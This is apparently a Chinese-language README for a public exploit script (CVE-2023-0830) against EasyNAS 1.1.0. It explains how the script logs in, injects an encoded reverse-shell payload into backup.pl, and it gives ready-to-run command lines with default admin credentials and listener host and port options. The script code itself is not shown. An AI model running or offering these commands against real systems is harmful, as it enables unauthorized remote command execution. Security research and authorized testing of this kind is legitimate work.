这个 Python 脚本是针对 EasyNAS 1.1.0 版本的强大利用工具,具有增强功能,包括集成监听器。所利用的漏洞是一个命令注入缺陷,需要认证。
脚本与目标服务器建立会话,然后使用用户提供的凭据发送登录请求。成功认证后,脚本构造一个有效载荷,执行时打开一个反向 shell 连接到用户指定的 IP 和端口。该有效载荷经过 URL 和 Base64 编码,然后通过精心构造的 GET 请求注入到服务器上的 backup.pl 文件中。
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} 利用模式:shell(集成反向 shell)或 reverse(外部监听器)
--lhost IP_ADDRESS 反向 shell 监听器的 IP 地址(默认为自动检测)
--lport PORT 反向 shell 监听器的端口(默认:4444)
--protocol {http,https} 使用的协议(默认:https)
--verbose 启用详细输出
--shell {bash,sh,python} 指定与集成监听器一起使用的 shell 类型(默认:bash)
此脚本仅用于教育目的和授权渗透测试。在针对任何网络或系统运行渗透测试之前,务必获得明确许可。
请负责任地使用。